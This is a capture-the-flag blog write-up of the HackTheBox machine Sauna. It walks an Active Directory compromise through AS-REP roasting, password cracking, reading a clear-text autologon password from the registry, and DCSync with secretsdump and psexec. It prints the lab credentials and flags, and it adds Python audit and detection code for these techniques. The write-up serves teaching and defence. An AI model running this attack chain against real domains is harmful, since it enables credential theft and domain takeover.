Hackthebox - Sauna

Summary

Sauna, a Windows box created by HackTheBox user egotisticalSW, was an overall easy-difficulty box. Initial enumeration exposes some employee names, from which we can build a username list. Running impacket's GetNPUsers.py against that list reveals a valid user and its AS-REP hash; after cracking it we use evil-winrm to get a shell as that user. Enumerating the registry we find a password for a service account, which gives us a shell as that account. svc_loanmgr has DCSync rights, so we use impacket's secretsdump.py to dump the Administrator credentials and psexec to get a shell as Administrator.

Enumeration

nmap scan

# Nmap 7.80 scan initiated Sat Feb 15 14:02:02 2020 as: nmap -sC -sV -oN nmap/sauna 10.10.10.175
Nmap scan report for 10.10.10.175
Host is up (0.15s latency).
Not shown: 988 filtered ports
PORT STATE SERVICE VERSION
53/tcp open domain?
| fingerprint-strings:
| DNSVersionBindReqTCP:
| version
|_ bind
80/tcp open http Microsoft IIS httpd 10.0
| http-methods:
|_ Potentially risky methods: TRACE
|_http-title: Egotistical Bank :: Home
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2020-02-16 03:02:23Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: EGOTISTICAL-BANK.LOCAL0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: EGOTISTICAL-BANK.LOCAL0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port53-TCP:V=7.80%I=7%D=2/15%Time=5E484042%P=x86_64-pc-linux-gnu%r(DNSV
SF:ersionBindReqTCP,20,"\0\x1e\0\x06\x81\x04\0\x01\0\0\0\0\0\0\x07version\
SF:x04bind\0\0\x10\0\x03");
Service Info: Host: SAUNA; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: 8h00m00s
| smb2-security-mode:
| 2.02:
|_ Message signing enabled and required
| smb2-time:
| date: 2020-02-16T03:04:16
|_ start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Feb 15 14:06:53 2020 -- 1 IP address (1 host up) scanned in 290.71 seconds

Let's start with the web server. The only interesting thing we see is the About page, which lists the names of the team.

Using those names I created a list of candidate usernames:

jenny.joy
j.joy
joy.jenny
jenny.j
j.jenny
jennyjoy
jjoy
joyjenny
jennyj
jjenny
jenny-joy
joy-jenny
jenny-j
j-jenny
james.doe
j.doe
doe.james
james.d
d.james
jamesdoe
jdoe
doejames
jamesd
djames
james-doe
doe-james
james-d
d-james
fergus.smith
f.smith
smith.fergus
fergus.s
s.fergus
fergussmith
fsmith
smithfergus
ferguss
sfergus
sauna
johnson
watson
fergus-smith
smith-fergus
fergus-s
s-fergus
shaun.coins
s.coins
coins.shaun
shaun.c
c.shaun
shauncoins
scoins
coinsshaun
shaunc
cshaun
shaun-coins
coins-shaun
shaun-c
c-shaun
sophie.driver
s.driver
driver.sophie
sophie.d
d.sophie
sophiedriver
sdriver
driversophie
sophied
dsophie
bowie.taylor
b.taylor
taylor.bowie
bowie.t
t.bowie
hugo.bear
h.bear
bear.hugo
hugo.b
b.hugo
steven.kerb
s.kerb
kerb.steven
steven.k
k.steven
bowietaylor
btaylor
taylorbowie
bowiet
tbowie
hugobear
hbear
bearhugo
hugob
bhugo
stevenkerb
skerb
kerbsteven
stevenk
ksteven

User

Using the list, I ran impacket's GetNPUsers.py to find any account that does not require Kerberos pre-authentication and retrieve its AS-REP hash:

python GetNPUsers.py EGOTISTICAL-BANK.LOCAL/ -usersfile users.lst -format john -dc-ip 10.10.10.175

And we get a hit on fsmith: the account is vulnerable to AS-REP roasting, so the tool returns a hash for it. Using john to crack the password:

john --wordlist=/usr/share/wordlists/rockyou.txt testhash

and we get valid credentials: fsmith:Thestrokes23

Using these with evil-winrm we get a shell as fsmith

and read user.txt: 1b5520b98d97cf17f24122a55baf70cf
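The reason fsmith's hash came back is that the account has the "Do not require Kerberos preauthentication" flag set in its userAccountControl attribute. The following added example (not part of the original write-up) decodes that attribute and lists the enabled accounts that are exposed; the account data is constructed for illustration, while the bit values and the LDAP bitwise-AND matching rule OID are the documented Microsoft ones.

```python
# Added example (not from the original write-up): audit which domain accounts
# are exposed to AS-REP roasting by decoding userAccountControl.
# The account data below is constructed; in practice it would come from an
# LDAP export of sAMAccountName and userAccountControl.

ACCOUNTDISABLE = 0x0002
NORMAL_ACCOUNT = 0x0200
DONT_EXPIRE_PASSWORD = 0x10000
DONT_REQ_PREAUTH = 0x400000  # "Do not require Kerberos preauthentication"

# Constructed sample: (sAMAccountName, userAccountControl)
SAMPLE_ACCOUNTS = [
    ("administrator", NORMAL_ACCOUNT | DONT_EXPIRE_PASSWORD),
    ("fsmith", NORMAL_ACCOUNT | DONT_EXPIRE_PASSWORD | DONT_REQ_PREAUTH),
    ("svc_loanmgr", NORMAL_ACCOUNT | DONT_EXPIRE_PASSWORD),
    ("old_contractor", NORMAL_ACCOUNT | DONT_REQ_PREAUTH | ACCOUNTDISABLE),
]


def decode_uac(uac):
    """Return the set of known flag names present in a userAccountControl value."""
    names = {
        ACCOUNTDISABLE: "ACCOUNTDISABLE",
        NORMAL_ACCOUNT: "NORMAL_ACCOUNT",
        DONT_EXPIRE_PASSWORD: "DONT_EXPIRE_PASSWORD",
        DONT_REQ_PREAUTH: "DONT_REQ_PREAUTH",
    }
    return {name for bit, name in names.items() if uac & bit}


def asrep_roastable(accounts):
    """Enabled accounts whose userAccountControl has DONT_REQ_PREAUTH set."""
    return [name for name, uac in accounts
            if uac & DONT_REQ_PREAUTH and not uac & ACCOUNTDISABLE]


def ldap_filter():
    """The equivalent check as an LDAP filter (1.2.840.113556.1.4.803 = bitwise AND)."""
    return ("(&(objectCategory=person)"
            "(userAccountControl:1.2.840.113556.1.4.803:=4194304)"   # 0x400000
            "(!(userAccountControl:1.2.840.113556.1.4.803:=2)))")    # not disabled


if __name__ == "__main__":
    by_name = dict(SAMPLE_ACCOUNTS)
    for name in asrep_roastable(SAMPLE_ACCOUNTS):
        print(f"{name}: {sorted(decode_uac(by_name[name]))}")
    print(ldap_filter())
```

Disabled accounts are excluded because the KDC will not issue them a TGT at all; for the enabled ones the fix is to clear the flag (it is rarely needed outside legacy Unix Kerberos clients) and, where it must stay, give the account a long random password so the recovered AS-REP material cannot be cracked.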

Privilege Escalation

Enumerating users with net user, we find another account, svc_loanmgr.

Looking for a password for that user, I checked PayloadsAllTheThings and used its registry lookup for the Winlogon DefaultPassword value:

reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon"

which exposes the password: Moneymakestheworldgoround!
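The value comes from Windows' automatic logon feature, which stores the credential in clear text under a key every local user can read. As an added example (not part of the write-up), the script below parses reg query output for that key and reports the finding; the output is constructed to mirror the value names Windows uses, and the user name and password in it are placeholders rather than the box's real values.

```python
# Added example (not from the original write-up): parse the output of
#   reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon"
# and flag an autologon configuration that stores a clear-text DefaultPassword.
# The sample output is constructed; the user name and password are placeholders.

SAMPLE_REG_OUTPUT = r"""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
    AutoRestartShell    REG_DWORD    0x1
    Shell    REG_SZ    explorer.exe
    AutoAdminLogon    REG_SZ    1
    DefaultDomainName    REG_SZ    EXAMPLE
    DefaultUserName    REG_SZ    svc_example
    DefaultPassword    REG_SZ    <placeholder-password>
"""


def parse_reg_query(text):
    """Turn 'Name    REG_TYPE    Data' lines into {name: (type, data)}."""
    values = {}
    for line in text.splitlines():
        # at most two splits so REG_SZ data containing spaces stays intact
        parts = line.strip().split(None, 2)
        if len(parts) == 3 and parts[1].startswith("REG_"):
            values[parts[0]] = (parts[1], parts[2])
    return values


def autologon_findings(values):
    """Return a list of findings about clear-text autologon credentials."""
    findings = []
    autologon = values.get("AutoAdminLogon", ("", "0"))[1].strip() == "1"
    has_pw = "DefaultPassword" in values
    if has_pw:
        user = values.get("DefaultUserName", ("", "<unknown>"))[1]
        findings.append(f"DefaultPassword stored in clear text for user {user}")
    if autologon and has_pw:
        findings.append("AutoAdminLogon is enabled; any local user can read this "
                        "password from HKLM")
    elif autologon:
        findings.append("AutoAdminLogon enabled without a registry DefaultPassword "
                        "(the password may be held as an LSA secret instead)")
    return findings


if __name__ == "__main__":
    for finding in autologon_findings(parse_reg_query(SAMPLE_REG_OUTPUT)):
        print("[!]", finding)
```

On a domain controller a service account left in this key is exactly the kind of foothold the rest of this write-up builds on, so the mitigation is to remove the DefaultPassword value and disable AutoAdminLogon; if unattended logon is genuinely required, the password belongs in the DefaultPassword LSA secret (as the Sysinternals Autologon tool stores it), not in a world-readable registry value.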

Now, using the above credentials, we see that svc_loanmgr has DCSync rights over the domain.

So using impacket's secretsdump.py we dump the Administrator credentials,

use them with psexec to get a shell as Administrator,

and grab root.txt,

which gives us root.txt: f3ee04965c68257382e31502cc5e881f
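Both steps that led here leave distinctive traces in the domain controller's Security log: an AS-REP roast shows up as event 4768 with pre-authentication type 0 (and usually RC4, encryption type 0x17), and DCSync shows up as event 4662 where a non-DC account exercises the DS-Replication-Get-Changes rights on the domain object. The following added example (not from the write-up) runs that detection logic over constructed events; the single-line key=value form is a constructed simplification of the fields those events carry, the control-access GUIDs are the documented ones, and the allowlist of accounts expected to replicate is an assumption for the sample.

```python
# Added example (not from the original write-up): detection logic for the two
# techniques used on this box, AS-REP roasting (event 4768) and DCSync
# (event 4662), run over constructed sample events. Real events come from the
# domain controller's Security log; the key=value single-line form here is a
# constructed simplification of the fields those events carry.

REPLICATION_RIGHTS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
    "89e95b76-444d-4c62-991a-0facbeda640c": "DS-Replication-Get-Changes-In-Filtered-Set",
}

# Accounts expected to replicate: domain controllers and directory sync
# connectors. Constructed allowlist for this sample.
REPLICATION_ALLOWLIST = {"DC01$", "MSOL_aadconnect"}

# Constructed events; IP addresses and the last GUID are placeholders.
SAMPLE_EVENTS = [
    "EventID=4768 TargetUserName=fsmith ServiceName=krbtgt PreAuthType=2 "
    "TicketEncryptionType=0x12 IpAddress=10.0.0.99",
    "EventID=4768 TargetUserName=fsmith ServiceName=krbtgt PreAuthType=0 "
    "TicketEncryptionType=0x17 IpAddress=10.0.0.99",
    "EventID=4662 SubjectUserName=DC01$ ObjectType=domainDNS "
    "Properties={1131f6ad-9c07-11d1-f79f-00c04fc2dcd2} AccessMask=0x100",
    "EventID=4662 SubjectUserName=svc_loanmgr ObjectType=domainDNS "
    "Properties={1131f6aa-9c07-11d1-f79f-00c04fc2dcd2},"
    "{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2} AccessMask=0x100",
    "EventID=4662 SubjectUserName=jdoe ObjectType=user "
    "Properties={00000000-0000-0000-0000-000000000000} AccessMask=0x10",
]


def parse_event(line):
    """Split a constructed 'key=value key=value' line into a dict."""
    return dict(field.split("=", 1) for field in line.split())


def detect(events):
    """Return (severity, technique, account, detail) tuples for suspicious events."""
    alerts = []
    for line in events:
        ev = parse_event(line)
        eid = ev.get("EventID")
        if eid == "4768" and ev.get("PreAuthType") == "0":
            # TGT issued without pre-authentication: the AS-REP carries material
            # encrypted with the user's key, i.e. an offline-crackable hash.
            etype = ev.get("TicketEncryptionType", "")
            severity = "high" if etype == "0x17" else "medium"  # RC4 cracks fastest
            alerts.append((severity, "asrep-roast", ev["TargetUserName"],
                           ev.get("IpAddress", "")))
        elif eid == "4662":
            props = ev.get("Properties", "").lower()
            rights = [name for guid, name in REPLICATION_RIGHTS.items() if guid in props]
            if rights and ev.get("SubjectUserName") not in REPLICATION_ALLOWLIST:
                # Replication rights exercised by something that is not a DC.
                alerts.append(("high", "dcsync", ev["SubjectUserName"], ",".join(rights)))
    return alerts


if __name__ == "__main__":
    for alert in detect(SAMPLE_EVENTS):
        print(alert)
```

Event 4662 is only generated for the domain object if "Audit Directory Service Access" is enabled and the domain head carries a SACL entry for the replication control-access rights, so the detection is worthless without that audit policy in place. The allowlist matters because legitimate replication from other DCs and from directory sync connectors produces the same event; anything outside it holding these rights, as svc_loanmgr did here, is either a misconfiguration to remove or an attack in progress.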

and we have pwned Sauna 💃

Author: Shubham Kumar
Link: https://f3v3r.in/htb/machines/retired/sauna/
Copyright Notice: All articles in this blog are licensed under CC BY-NC-SA 4.0 unless stating additionally.